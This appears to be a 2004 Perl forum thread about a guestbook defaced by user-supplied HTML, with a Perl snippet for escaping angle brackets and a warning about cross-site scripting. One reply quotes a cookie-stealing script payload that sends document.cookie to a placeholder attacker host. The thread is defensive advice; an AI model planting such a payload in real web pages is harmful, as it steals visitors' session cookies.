in reply to Emergency! Our guestbook is getting trashed by HTML!

Setting $allow_html to 0 will *attempt* to remove HTML. It will fail if the person supplies a < without a matching >. Fixing it would be convoluted. It's easier to just escape < and >:

if ($allow_html != 1) {
   $value =~ s/</&lt;/g;
   $value =~ s/>/&gt;/g;
}

[download]

Better yet, have a look at secure versions of Matt's scripts.

Replies are listed 'Best First'.
Re^2: Emergency! Our guestbook is getting trashed by HTML!
by amw1 (Friar) on Dec 17, 2004 at 16:53 UTC
    THis or something similar should be in any code that re-displays user entered input. HTML::Entities can do a very good job with this. While an unclosed <H1> may be inconvienent this can be even worse: 
    
<script>
document.location='http://nasty.site/cgi-bin/cookie.cgi?'%20+document.
+cookie
</script>

    [download]
    take a look at http://www.cgisecurity.com/articles/xss-faq.shtml#theft for information on why this can be "very bad"

    in short: never display uncooked user input in a web page unless you have a very good reason to.

[reply]
[d/l]
      Yah, you should look at http://www.shocking.com/~rsnake/xss.html There are a lot of risks there, it seems.
[reply]

In Section Seekers of Perl Wisdom